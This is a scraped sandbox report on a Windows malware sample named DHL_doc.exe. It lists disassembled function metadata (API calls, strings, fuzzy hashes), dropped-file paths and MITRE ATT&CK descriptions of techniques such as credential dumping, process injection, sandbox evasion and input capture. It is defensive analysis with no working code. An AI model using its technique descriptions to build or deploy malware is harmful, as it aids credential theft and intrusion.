Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: d16fb6627ba1289dc2012eba7bc0660b35600898b64318822b870019d9b37733
Instruction ID: 821667e33cb42849e600800d8cc3392f6b9dd6a9b3ddb5d3c26b2b4be5f2a041
Opcode Fuzzy Hash: d16fb6627ba1289dc2012eba7bc0660b35600898b64318822b870019d9b37733
Instruction Fuzzy Hash: 19D05E725003286BDA20A7A4AC4EFCB3A6CDB04751F0002A1B756E2091EAB4D984CBD0

Function 00F1D21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00F1D220

Strings

%.3d, xrefs: 00F1D22B
X64, xrefs: 00F1D2A8

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: d177cc846f3b32b138cd99b4e3727b81af49053c80928d3db71968ae1b1e470a
Instruction ID: ac831ef6f66bfd71daf5f7f285edd62130bacff664ca1fd0b9e973fdaf0d211a
Opcode Fuzzy Hash: d177cc846f3b32b138cd99b4e3727b81af49053c80928d3db71968ae1b1e470a
Instruction Fuzzy Hash: 98D01262808258E9CB50A6D0CC49BF9B3BCEB19301F608453F917A1040D634D5897762

Function 00F52356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F5236C
PostMessageW.USER32(00000000), ref: 00F52373

Part of subcall function 00F2E97B: Sleep.KERNEL32 ref: 00F2E9F3

Strings

Shell_TrayWnd, xrefs: 00F52365

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: f7a1542bed08c7e6857637310f6b3edd61b3881053b1a61685d20202d508a6ea
Instruction ID: 4e9bef35ba810bbd2adb185b2aa59e75a1d76f647c72f35134bc39d60a635e41
Opcode Fuzzy Hash: f7a1542bed08c7e6857637310f6b3edd61b3881053b1a61685d20202d508a6ea
Instruction Fuzzy Hash: 51D0A9323803107AE264B370AC0FFCA76049B00B01F0009027306EA0D0C8A0A8009A84

Function 00F52322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F5232C
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00F5233F

Part of subcall function 00F2E97B: Sleep.KERNEL32 ref: 00F2E9F3

Strings

Shell_TrayWnd, xrefs: 00F52325

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 6878107aba31ba88303dbc4b62604a07b0490471e7544824039978e4bd0f2876
Instruction ID: f27638c8a48d3064a1031f2afb132bcd3ed4b47a46a7eb265d08f2f28d663e80
Opcode Fuzzy Hash: 6878107aba31ba88303dbc4b62604a07b0490471e7544824039978e4bd0f2876
Instruction Fuzzy Hash: 01D01276394314BBE664B770ED1FFCA7A149B00B11F104916774AEA1D0D9F4A841DB94

Function 00EFBDFD Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00EFBE93
GetLastError.KERNEL32 ref: 00EFBEA1
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00EFBEFC

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 462392a219fe293f7672e6e517a1bede7e6db56a9339d670fb5f5d252689b48a
Instruction ID: c4c75931be0d1fbb0e27bd38b56cdf7d839b93426f255b2aaf4f61123a93750b
Opcode Fuzzy Hash: 462392a219fe293f7672e6e517a1bede7e6db56a9339d670fb5f5d252689b48a
Instruction Fuzzy Hash: 0641D43670020EAFCF218F65CC44ABA7BA5EF41324F156169FB59B71A1DB318D00DB50

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report DHL_doc.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\27-180b5

C:\Users\user\AppData\Local\Temp\subpredication

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Windows Analysis Report
DHL_doc.exe

Function 00EC42DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Function 00EC42A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Function 00F02BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Function 00EC2CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Function 00F0065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Function 00EC344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 00EC2B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Function 00EC3170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Function 024C25F0 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 00EC2C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Function 024C23B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 148
fileCOMMON

Function 00EC3B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
registryCOMMON

Function 024C12A0 Relevance: 6.7, APIs: 4, Instructions: 720
processthreadCOMMON

Function 00EC3923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94
windowCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre